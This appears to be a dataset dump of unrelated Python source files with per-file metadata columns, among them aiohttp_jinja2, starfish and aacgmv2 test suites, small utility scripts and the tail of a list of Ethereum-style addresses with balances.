(986, '0x942da83c7bb0b2133d29897588f4133d3062fc11', 169.41294761),
(987, '0x4f16e8946a2443bc4eb263d38212b7767e199ad7', 166.9114),
(988, '0x412a9425eff7b9eed4c8a88425190175018750e6', 165.9),
(989, '0x6ffc62a2e1fdba6330446d0c67db9b5b6dd1357b', 165.26242431),
(990, '0xeb50fd87ac700b6caa07a6743e515521beff2520', 165.05011228),
(991, '0xa359714e9fccee54025adda0e630b8293555e387', 165.0),
(992, '0xdf34d5f3b25b582fc05b2c6552a1ebb475fe2b31', 165.0),
(993, '0xf11b94cf137cb3f1aa972f8d4672cc51cc7564c7', 164.97736337),
(994, '0x71b8147f871f7aa31d3d324c65ba6be92df79cd5', 164.38781774),
(995, '0x3eb5820ce5d1d7299fdc885265442dfda58084ce', 162.0),
(996, '0xf21f468c31b1742d23fa47bd172e0bf48a2b5d8b', 161.94814128),
(997, '0x56fb8e41851daf7f90a628b644c9d29d5cd8cf18', 161.88919817),
(998, '0x73bd7221e670d1894629467cc4e5d32a0f0759ea', 161.35126783),
(999, '0x541c8e9fb13fe0a1065cda51a5248df2cc8f2afd', 161.0),
(1000, '0x7c3c734d0f46602606fe48d30ffd932ddf6296ac', 160.58399439)
) | 69.244267 | 71 | 0.783937 | 4,003 | 69,452 | 13.600799 | 0.77292 | 0.000882 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.614287 | 0.100847 | 69,452 | 1,003 | 72 | 69.244267 | 0.257542 | 0 | 0 | 0 | 0 | 0 | 0.604734 | 0.604734 | 0 | 0 | 0.604734 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
d55580dd9f11db25e396871fa31fd784862f8f6d | 149 | py | Python | CodeWars/2016/MakingCopies-7k.py | JLJTECH/TutorialTesting | f2dbbd49a86b3b086d0fc156ac3369fb74727f86 | [
"MIT"
] | null | null | null | CodeWars/2016/MakingCopies-7k.py | JLJTECH/TutorialTesting | f2dbbd49a86b3b086d0fc156ac3369fb74727f86 | [
"MIT"
] | null | null | null | CodeWars/2016/MakingCopies-7k.py | JLJTECH/TutorialTesting | f2dbbd49a86b3b086d0fc156ac3369fb74727f86 | [
"MIT"
] | null | null | null | # Take a list and return a shallow copy.
def copy_list(l):
new_copy = l[:]
return new_copy
# Alternate solution
def copy_list(l):
return list(l) | 14.9 | 38 | 0.711409 | 27 | 149 | 3.777778 | 0.481481 | 0.147059 | 0.215686 | 0.235294 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.187919 | 149 | 10 | 39 | 14.9 | 0.842975 | 0.369128 | 0 | 0.4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | false | 0 | 0 | 0.2 | 0.8 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
6372109243b6a31042720d1e828d6479c8642b1a | 193 | py | Python | scripts/welcomeJudge.py | ChoiSangok/BaekJoon-Challenge | a75505064816935fc7d7955cc1eba94e9d84c6e5 | [
"MIT"
] | 3 | 2021-08-02T12:32:14.000Z | 2021-08-05T13:26:32.000Z | scripts/welcomeJudge.py | choipureum/BaekJoon-Challenge | 00604ddb6cb6e35d310ef2449d70f138db3f7314 | [
"MIT"
] | 24 | 2021-08-04T04:39:23.000Z | 2021-08-13T13:16:29.000Z | scripts/welcomeJudge.py | choipureum/BaekJoon-Challenge | 00604ddb6cb6e35d310ef2449d70f138db3f7314 | [
"MIT"
] | 2 | 2021-08-04T04:31:26.000Z | 2021-08-05T13:26:38.000Z | import os
import sys
print("[Welcome PR!]")
print("Please regist comment with Command")
print("run : run (path)/문제 테스팅(Success/Error)")
print(" ex) run test/Implementation/2857/main.java")
| 24.125 | 55 | 0.715026 | 29 | 193 | 4.758621 | 0.793103 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.023669 | 0.124352 | 193 | 7 | 56 | 27.571429 | 0.792899 | 0 | 0 | 0 | 0 | 0 | 0.678756 | 0.176166 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0.666667 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 6 |
63c1536396da054bb8e878fd4a8432563c320df7 | 4,668 | py | Python | tests/test_jinja_globals.py | ccxtechnologies/aiohttp-jinja2-async | e46c33fbf50a50cc4b3204c65556b8957e91cae0 | [
"Apache-2.0"
] | 3 | 2021-01-09T19:52:01.000Z | 2021-11-15T11:15:09.000Z | tests/test_jinja_globals.py | ccxtechnologies/aiohttp-jinja2-async | e46c33fbf50a50cc4b3204c65556b8957e91cae0 | [
"Apache-2.0"
] | null | null | null | tests/test_jinja_globals.py | ccxtechnologies/aiohttp-jinja2-async | e46c33fbf50a50cc4b3204c65556b8957e91cae0 | [
"Apache-2.0"
] | 1 | 2021-01-09T16:42:33.000Z | 2021-01-09T16:42:33.000Z | import jinja2
import pytest
from aiohttp import web
import aiohttp_jinja2
def test_get_env():
app = web.Application()
aiohttp_jinja2.setup(app, loader=jinja2.DictLoader(
{'tmpl.jinja2': "tmpl"}))
env = aiohttp_jinja2.get_env(app)
assert isinstance(env, jinja2.Environment)
assert env is aiohttp_jinja2.get_env(app)
async def test_url(aiohttp_client):
@aiohttp_jinja2.template('tmpl.jinja2')
async def index(request):
return {}
async def other(request):
return
app = web.Application()
aiohttp_jinja2.setup(app, loader=jinja2.DictLoader(
{'tmpl.jinja2':
"{{ url('other', name='John_Doe')}}"}))
app.router.add_route('GET', '/', index)
app.router.add_route('GET', '/user/{name}', other, name='other')
client = await aiohttp_client(app)
resp = await client.get('/')
assert 200 == resp.status
txt = await resp.text()
assert '/user/John_Doe' == txt
async def test_url_with_query(aiohttp_client):
@aiohttp_jinja2.template('tmpl.jinja2')
async def index(request):
return {}
app = web.Application()
aiohttp_jinja2.setup(app, loader=jinja2.DictLoader(
{'tmpl.jinja2':
"{{ url('index', query_={'foo': 'bar'})}}"}))
app.router.add_get('/', index, name='index')
client = await aiohttp_client(app)
resp = await client.get('/')
assert 200 == resp.status
txt = await resp.text()
assert '/?foo=bar' == txt
async def test_url_int_param(aiohttp_client):
@aiohttp_jinja2.template('tmpl.jinja2')
async def index(request):
return {}
async def other(request):
return
app = web.Application()
aiohttp_jinja2.setup(app, loader=jinja2.DictLoader(
{'tmpl.jinja2':
"{{ url('other', arg=1)}}"}))
app.router.add_route('GET', '/', index)
app.router.add_route('GET', '/uid/{arg}', other, name='other')
client = await aiohttp_client(app)
resp = await client.get('/')
assert 200 == resp.status
txt = await resp.text()
assert '/uid/1' == txt
async def test_url_param_forbidden_type(aiohttp_client):
async def index(request):
with pytest.raises(TypeError,
match=(r"argument value should be str or int, "
r"got arg -> \[<class 'bool'>\] True")):
aiohttp_jinja2.render_template('tmpl.jinja2', request, {})
return web.Response()
async def other(request):
return
app = web.Application()
aiohttp_jinja2.setup(app, loader=jinja2.DictLoader(
{'tmpl.jinja2':
"{{ url('other', arg=True)}}"}))
app.router.add_route('GET', '/', index)
app.router.add_route('GET', '/uid/{arg}', other, name='other')
client = await aiohttp_client(app)
resp = await client.get('/')
assert 200 == resp.status
async def test_helpers_disabled(aiohttp_client):
async def index(request):
with pytest.raises(jinja2.UndefinedError,
match="'url' is undefined"):
aiohttp_jinja2.render_template('tmpl.jinja2', request, {})
return web.Response()
app = web.Application()
aiohttp_jinja2.setup(
app,
default_helpers=False,
loader=jinja2.DictLoader({
'tmpl.jinja2': "{{ url('index')}}"
}),
enable_async=False,
)
app.router.add_route('GET', '/', index)
client = await aiohttp_client(app)
resp = await client.get('/')
assert 200 == resp.status
async def test_static(aiohttp_client):
@aiohttp_jinja2.template('tmpl.jinja2')
async def index(request):
return {}
app = web.Application()
aiohttp_jinja2.setup(app, loader=jinja2.DictLoader(
{'tmpl.jinja2':
"{{ static('whatever.js') }}"}))
app['static_root_url'] = '/static'
app.router.add_route('GET', '/', index)
client = await aiohttp_client(app)
resp = await client.get('/')
assert 200 == resp.status
txt = await resp.text()
assert '/static/whatever.js' == txt
async def test_static_var_missing(aiohttp_client, caplog):
async def index(request):
with pytest.raises(RuntimeError, match='static_root_url'):
aiohttp_jinja2.render_template('tmpl.jinja2', request, {})
return web.Response()
app = web.Application()
aiohttp_jinja2.setup(app, loader=jinja2.DictLoader(
{'tmpl.jinja2':
"{{ static('whatever.js') }}"}))
app.router.add_route('GET', '/', index)
client = await aiohttp_client(app)
resp = await client.get('/')
assert 200 == resp.status # static_root_url is not set
| 26.827586 | 74 | 0.615895 | 558 | 4,668 | 5.014337 | 0.15233 | 0.083631 | 0.042888 | 0.054682 | 0.801644 | 0.766619 | 0.766619 | 0.73767 | 0.73767 | 0.702645 | 0 | 0.018757 | 0.23479 | 4,668 | 173 | 75 | 26.982659 | 0.764558 | 0.00557 | 0 | 0.669355 | 0 | 0 | 0.136207 | 0.009052 | 0 | 0 | 0 | 0 | 0.104839 | 1 | 0.008065 | false | 0 | 0.032258 | 0 | 0.120968 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
89301bc0dbd02a537b94193a54365521083a063e | 1,782 | py | Python | tests/misc/test_assertion.py | takuseno/mvc-drl | 2d9dede864d4018ec91a7d69c7435f885e5fc7d5 | [
"MIT"
] | 11 | 2019-02-10T07:00:34.000Z | 2020-08-03T12:49:28.000Z | tests/misc/test_assertion.py | takuseno/mvc-drl | 2d9dede864d4018ec91a7d69c7435f885e5fc7d5 | [
"MIT"
] | null | null | null | tests/misc/test_assertion.py | takuseno/mvc-drl | 2d9dede864d4018ec91a7d69c7435f885e5fc7d5 | [
"MIT"
] | 1 | 2019-02-10T07:00:34.000Z | 2019-02-10T07:00:34.000Z | import numpy as np
import pytest
from mvc.misc.assertion import assert_type
from mvc.misc.assertion import assert_shape
from mvc.misc.assertion import assert_batch_shape
from mvc.misc.assertion import assert_batch_size_match
from mvc.misc.assertion import assert_shape_match
from mvc.misc.assertion import assert_shape_length
from mvc.misc.assertion import assert_scalar
def test_assert_type():
with pytest.raises(AssertionError):
assert_type('error', int)
assert_type('error', str)
def test_assert_shape():
with pytest.raises(AssertionError):
assert_shape(np.random.random((4, 10)), (4,))
assert_shape(np.random.random((4, 10)), (4, 10))
def test_assert_batch_shape():
with pytest.raises(AssertionError):
assert_batch_shape(np.random.random((4, 10)), (11,))
assert_batch_shape(np.random.random((4, 10)), (10,))
def test_assert_batch_size_match():
with pytest.raises(AssertionError):
assert_batch_size_match(np.random.random((4, 10)), np.random.random((5, 10)))
assert_batch_size_match(np.random.random((4, 10)), np.random.random((4, 9)))
def test_assert_shape_match():
with pytest.raises(AssertionError):
assert_shape_match(np.random.random((4, 10)), np.random.random((4, 11)))
assert_shape_match(np.random.random((4, 10)), np.random.random((4, 10)))
def test_assert_shape_length():
with pytest.raises(AssertionError):
assert_shape_length(np.random.random((4, 10)), 3)
assert_shape_length(np.random.random((4, 10)), 2)
def test_assert_scalar():
with pytest.raises(AssertionError):
assert_scalar(np.random.random((4,)))
with pytest.raises(AssertionError):
assert_scalar(np.random.random((4, 10)))
assert_scalar(np.random.random((4, 1)))
| 29.213115 | 85 | 0.7211 | 260 | 1,782 | 4.726923 | 0.130769 | 0.110659 | 0.193653 | 0.195281 | 0.861676 | 0.786005 | 0.573637 | 0.5476 | 0.254679 | 0.254679 | 0 | 0.037279 | 0.141975 | 1,782 | 60 | 86 | 29.7 | 0.766514 | 0 | 0 | 0.205128 | 0 | 0 | 0.005612 | 0 | 0 | 0 | 0 | 0 | 0.948718 | 1 | 0.179487 | true | 0 | 0.230769 | 0 | 0.410256 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
9820ed49c3c5dae122bbe7ea010f858ca94ba254 | 130 | py | Python | openpype/hosts/houdini/api/plugin.py | dangerstudios/OpenPype | 10ddcc4699137888616eec57cd7fac9648189714 | [
"MIT"
] | null | null | null | openpype/hosts/houdini/api/plugin.py | dangerstudios/OpenPype | 10ddcc4699137888616eec57cd7fac9648189714 | [
"MIT"
] | null | null | null | openpype/hosts/houdini/api/plugin.py | dangerstudios/OpenPype | 10ddcc4699137888616eec57cd7fac9648189714 | [
"MIT"
] | null | null | null | from avalon import houdini
from openpype.api import PypeCreatorMixin
class Creator(PypeCreatorMixin, houdini.Creator):
pass
| 18.571429 | 49 | 0.815385 | 15 | 130 | 7.066667 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.138462 | 130 | 6 | 50 | 21.666667 | 0.946429 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.25 | 0.5 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
982d7e4b4c6f06ac1374e5acc6d921426d7ffdf5 | 163 | wsgi | Python | app.wsgi | drawcode/blueprints-flask | 742b33f68484b3688b0ef60c97a8fa8d22fea43c | [
"MIT"
] | 1 | 2017-11-01T02:55:11.000Z | 2017-11-01T02:55:11.000Z | app.wsgi | drawcode/blueprints-flask | 742b33f68484b3688b0ef60c97a8fa8d22fea43c | [
"MIT"
] | null | null | null | app.wsgi | drawcode/blueprints-flask | 742b33f68484b3688b0ef60c97a8fa8d22fea43c | [
"MIT"
] | null | null | null | import sys, os
sys.path.append(os.path.dirname(__file__))
sys.path.append(os.path.join(os.path.dirname(__file__), "app"))
from app import app as application | 27.166667 | 64 | 0.742331 | 27 | 163 | 4.185185 | 0.444444 | 0.159292 | 0.230089 | 0.265487 | 0.336283 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.110429 | 163 | 6 | 65 | 27.166667 | 0.77931 | 0 | 0 | 0 | 0 | 0 | 0.018868 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
98327f17b8e00cdb5e6da77a05aeb8fa29944b14 | 49 | py | Python | models/detection/__init__.py | canyilmaz90/pytorch-YOLOv4 | 0217bccd2790a9c86e405a3d6d68071ff4db3775 | [
"Apache-2.0"
] | null | null | null | models/detection/__init__.py | canyilmaz90/pytorch-YOLOv4 | 0217bccd2790a9c86e405a3d6d68071ff4db3775 | [
"Apache-2.0"
] | null | null | null | models/detection/__init__.py | canyilmaz90/pytorch-YOLOv4 | 0217bccd2790a9c86e405a3d6d68071ff4db3775 | [
"Apache-2.0"
] | null | null | null | from .yolov4 import *
from .yolov4tiny import *
| 12.25 | 25 | 0.734694 | 6 | 49 | 6 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.05 | 0.183673 | 49 | 3 | 26 | 16.333333 | 0.85 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
9849016b8628479c7f7478a25ac44c8795f2acdd | 28 | py | Python | __init__.py | rogerlew/all_your_base | 3b6f1cec0d6ad51a93aa1be47e29208a5217061c | [
"BSD-3-Clause"
] | null | null | null | __init__.py | rogerlew/all_your_base | 3b6f1cec0d6ad51a93aa1be47e29208a5217061c | [
"BSD-3-Clause"
] | null | null | null | __init__.py | rogerlew/all_your_base | 3b6f1cec0d6ad51a93aa1be47e29208a5217061c | [
"BSD-3-Clause"
] | null | null | null | from .all_your_base import * | 28 | 28 | 0.821429 | 5 | 28 | 4.2 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.107143 | 28 | 1 | 28 | 28 | 0.84 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
9861d55d2295f5fdc861a5fbaa0ab9f18794e691 | 1,926 | py | Python | starfish/core/spots/Decode/test/test_decoding_without_spots.py | kne42/starfish | 78b348c9756f367221dcca725cfa5107e5520b33 | [
"MIT"
] | null | null | null | starfish/core/spots/Decode/test/test_decoding_without_spots.py | kne42/starfish | 78b348c9756f367221dcca725cfa5107e5520b33 | [
"MIT"
] | null | null | null | starfish/core/spots/Decode/test/test_decoding_without_spots.py | kne42/starfish | 78b348c9756f367221dcca725cfa5107e5520b33 | [
"MIT"
] | null | null | null | import os
from tempfile import TemporaryDirectory
import pandas as pd
import starfish
from starfish.core.test.factories import two_spot_sparse_coded_data_factory
def test_per_round_max_spot_decoding_without_spots():
codebook, image_stack, max_intensity = two_spot_sparse_coded_data_factory()
bd = starfish.spots.DetectSpots.BlobDetector(
min_sigma=1, max_sigma=1, num_sigma=1, threshold=max_intensity + 0.1)
no_spots = bd.run(image_stack)
decode = starfish.spots.Decode.PerRoundMaxChannel(codebook)
decoded_no_spots: starfish.IntensityTable = decode.run(no_spots)
decoded_spot_table = decoded_no_spots.to_decoded_spots()
with TemporaryDirectory() as dir_:
filename = os.path.join(dir_, 'test.csv')
decoded_spot_table.save_csv(os.path.join(dir_, 'test.csv'))
# verify we can concatenate two empty tables
table1 = pd.read_csv(filename, index_col=0)
table2 = pd.read_csv(filename, index_col=0)
pd.concat([table1, table2], axis=0)
def test_metric_decoding_without_spots():
codebook, image_stack, max_intensity = two_spot_sparse_coded_data_factory()
bd = starfish.spots.DetectSpots.BlobDetector(
min_sigma=1, max_sigma=1, num_sigma=1, threshold=max_intensity + 0.1)
no_spots = bd.run(image_stack)
decode = starfish.spots.Decode.MetricDistance(
codebook, max_distance=0, min_intensity=max_intensity + 0.1
)
decoded_no_spots: starfish.IntensityTable = decode.run(no_spots)
decoded_spot_table = decoded_no_spots.to_decoded_spots()
with TemporaryDirectory() as dir_:
filename = os.path.join(dir_, 'test.csv')
decoded_spot_table.save_csv(os.path.join(dir_, 'test.csv'))
# verify we can concatenate two empty tables
table1 = pd.read_csv(filename, index_col=0)
table2 = pd.read_csv(filename, index_col=0)
pd.concat([table1, table2], axis=0)
| 35.018182 | 79 | 0.731049 | 270 | 1,926 | 4.907407 | 0.255556 | 0.042264 | 0.042264 | 0.039245 | 0.826415 | 0.826415 | 0.804528 | 0.804528 | 0.804528 | 0.804528 | 0 | 0.01697 | 0.173936 | 1,926 | 54 | 80 | 35.666667 | 0.815839 | 0.044133 | 0 | 0.685714 | 0 | 0 | 0.01741 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.057143 | false | 0 | 0.142857 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
98b47a681e129d062eb172e9d48b3f940d3782ca | 279 | py | Python | office365/outlook/calendar/meeting_time_suggestion.py | rikeshtailor/Office365-REST-Python-Client | ca7bfa1b22212137bb4e984c0457632163e89a43 | [
"MIT"
] | 544 | 2016-08-04T17:10:16.000Z | 2022-03-31T07:17:20.000Z | office365/outlook/calendar/meeting_time_suggestion.py | rikeshtailor/Office365-REST-Python-Client | ca7bfa1b22212137bb4e984c0457632163e89a43 | [
"MIT"
] | 438 | 2016-10-11T12:24:22.000Z | 2022-03-31T19:30:35.000Z | office365/outlook/calendar/meeting_time_suggestion.py | rikeshtailor/Office365-REST-Python-Client | ca7bfa1b22212137bb4e984c0457632163e89a43 | [
"MIT"
] | 202 | 2016-08-22T19:29:40.000Z | 2022-03-30T20:26:15.000Z | from office365.runtime.client_value import ClientValue
class MeetingTimeSuggestion(ClientValue):
"""
A meeting suggestion that includes information like meeting time, attendance likelihood, individual availability,
and available meeting locations.
"""
pass
| 27.9 | 117 | 0.774194 | 28 | 279 | 7.678571 | 0.892857 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012987 | 0.172043 | 279 | 9 | 118 | 31 | 0.917749 | 0.523297 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
7f6d7c91b38d0ca355a04a19e95b43fb91aa77e9 | 50,549 | py | Python | aacgmv2/tests/test_py_aacgmv2.py | DannoPeters/aacgmv2 | 6f21485453a3cfc76328cc6684952de0b1fc4a50 | [
"MIT"
] | null | null | null | aacgmv2/tests/test_py_aacgmv2.py | DannoPeters/aacgmv2 | 6f21485453a3cfc76328cc6684952de0b1fc4a50 | [
"MIT"
] | null | null | null | aacgmv2/tests/test_py_aacgmv2.py | DannoPeters/aacgmv2 | 6f21485453a3cfc76328cc6684952de0b1fc4a50 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import division, absolute_import, unicode_literals
import datetime as dt
import numpy as np
import pytest
import aacgmv2
class TestPyAACGMV2:
@classmethod
def test_module_structure(self):
"""Test module structure"""
assert aacgmv2
assert aacgmv2.convert_bool_to_bit
assert aacgmv2.convert_str_to_bit
assert aacgmv2.convert_mlt
assert aacgmv2.convert_latlon
assert aacgmv2.convert_latlon_arr
assert aacgmv2.get_aacgm_coord
assert aacgmv2.get_aacgm_coord_arr
assert aacgmv2.wrapper
assert aacgmv2.wrapper.set_coeff_path
@classmethod
def test_module_parameters(self):
"""Test module constants"""
from os import path
path1 = path.join("aacgmv2", "aacgmv2", "aacgm_coeffs",
"aacgm_coeffs-12-")
if aacgmv2.AACGM_v2_DAT_PREFIX.find(path1) < 0:
raise AssertionError()
path2 = path.join("aacgmv2", "aacgmv2", "magmodel_1590-2015.txt")
if aacgmv2.IGRF_COEFFS.find(path2) < 0:
raise AssertionError()
del path1, path2
class TestConvertLatLon:
def setup(self):
"""Runs before every method to create a clean testing setup"""
self.dtime = dt.datetime(2015, 1, 1, 0, 0, 0)
self.ddate = dt.date(2015, 1, 1)
self.lat_out = None
self.lon_out = None
self.r_out = None
def teardown(self):
"""Runs after every method to clean up previous testing"""
del self.lat_out, self.lon_out, self.r_out, self.dtime, self.ddate
def test_convert_latlon(self):
"""Test single value latlon conversion"""
(self.lat_out, self.lon_out,
self.r_out) = aacgmv2.convert_latlon(60, 0, 300, self.dtime)
np.testing.assert_almost_equal(self.lat_out, 58.2258, decimal=4)
np.testing.assert_almost_equal(self.lon_out, 81.1685, decimal=4)
np.testing.assert_almost_equal(self.r_out, 1.0457, decimal=4)
def test_convert_latlon_badidea(self):
"""Test single value latlon conversion with a bad flag"""
code = "G2A | BADIDEA"
(self.lat_out, self.lon_out,
self.r_out) = aacgmv2.convert_latlon(60, 0, 3000, self.dtime, code)
np.testing.assert_almost_equal(self.lat_out, 64.3568, decimal=4)
np.testing.assert_almost_equal(self.lon_out, 83.3027, decimal=4)
np.testing.assert_almost_equal(self.r_out, 1.4694, decimal=4)
del code
def test_convert_latlon_location_failure(self):
"""Test single value latlon conversion with a bad location"""
(self.lat_out, self.lon_out,
self.r_out) = aacgmv2.convert_latlon(0, 0, 0, self.dtime)
if not (np.isnan(self.lat_out) & np.isnan(self.lon_out) &
np.isnan(self.r_out)):
raise AssertionError()
def test_convert_latlon_time_failure(self):
"""Test single value latlon conversion with a bad datetime"""
with pytest.raises(AssertionError):
(self.lat_out, self.lon_out,
self.r_out) = aacgmv2.convert_latlon(60, 0, 300, None)
def test_convert_latlon_datetime_date(self):
"""Test single latlon conversion with date and datetime input"""
(self.lat_out, self.lon_out,
self.r_out) = aacgmv2.convert_latlon(60, 0, 300, self.ddate)
lat_2, lon_2, r_2 = aacgmv2.convert_latlon(60, 0, 300, self.dtime)
if self.lat_out != lat_2:
raise AssertionError()
if self.lon_out != lon_2:
raise AssertionError()
if self.r_out != r_2:
raise AssertionError()
del lat_2, lon_2, r_2
def test_warning_below_ground_convert_latlon(self):
""" Test that a warning is issued if altitude is below zero"""
import logbook
lwarn = u"conversion not intended for altitudes < 0 km"
with logbook.TestHandler() as handler:
(self.lat_out, self.lon_out,
self.r_out) = aacgmv2.convert_latlon(60, 0, -1, self.dtime)
if not handler.has_warning(lwarn):
raise AssertionError()
handler.close()
def test_convert_latlon_maxalt_failure(self):
"""For a single value, test failure for an altitude too high for
coefficients"""
(self.lat_out, self.lon_out,
self.r_out) = aacgmv2.convert_latlon(60, 0, 2001, self.dtime)
if not (np.isnan(self.lat_out) & np.isnan(self.lon_out) &
np.isnan(self.r_out)):
raise AssertionError()
def test_convert_latlon_lat_failure(self):
"""Test error return for co-latitudes above 90 for a single value"""
with pytest.raises(AssertionError):
aacgmv2.convert_latlon(91, 0, 300, self.dtime)
with pytest.raises(AssertionError):
aacgmv2.convert_latlon(-91, 0, 300, self.dtime)
class TestConvertLatLonArr:
def setup(self):
"""Runs before every method to create a clean testing setup"""
self.dtime = dt.datetime(2015, 1, 1, 0, 0, 0)
self.ddate = dt.date(2015, 1, 1)
self.lat_out = None
self.lon_out = None
self.r_out = None
def teardown(self):
"""Runs after every method to clean up previous testing"""
del self.lat_out, self.lon_out, self.r_out, self.dtime, self.ddate
def test_convert_latlon_arr_single_val(self):
"""Test array latlon conversion for a single value"""
(self.lat_out, self.lon_out,
self.r_out) = aacgmv2.convert_latlon_arr(60, 0, 300, self.dtime)
if not isinstance(self.lat_out, np.ndarray):
raise AssertionError()
if not isinstance(self.lon_out, np.ndarray):
raise AssertionError()
if not isinstance(self.r_out, np.ndarray):
raise AssertionError()
if not (self.r_out.shape == self.lon_out.shape and
self.lat_out.shape == self.r_out.shape and
self.r_out.shape == (1,)):
raise AssertionError()
np.testing.assert_allclose(self.lat_out, [58.2257709], rtol=1e-4)
np.testing.assert_allclose(self.lon_out, [81.16846959], rtol=1e-4)
np.testing.assert_allclose(self.r_out, [1.04566346], rtol=1e-4)
def test_convert_latlon_arr_list_single(self):
"""Test array latlon conversion for list input of single values"""
(self.lat_out, self.lon_out,
self.r_out) = aacgmv2.convert_latlon_arr([60], [0], [300], self.dtime)
if not isinstance(self.lat_out, np.ndarray):
raise AssertionError()
if not isinstance(self.lon_out, np.ndarray):
raise AssertionError()
if not isinstance(self.r_out, np.ndarray):
raise AssertionError()
if not (self.r_out.shape == self.lon_out.shape and
self.lat_out.shape == self.r_out.shape and
self.r_out.shape == (1,)):
raise AssertionError()
np.testing.assert_allclose(self.lat_out, [58.2257709], rtol=1e-4)
np.testing.assert_allclose(self.lon_out, [81.16846959], rtol=1e-4)
np.testing.assert_allclose(self.r_out, [1.04566346], rtol=1e-4)
def test_convert_latlon_arr_list(self):
"""Test array latlon conversion for list input"""
(self.lat_out, self.lon_out,
self.r_out) = aacgmv2.convert_latlon_arr([60, 61], [0, 0], [300, 300],
self.dtime)
if not isinstance(self.lat_out, np.ndarray):
raise AssertionError()
if not isinstance(self.lon_out, np.ndarray):
raise AssertionError()
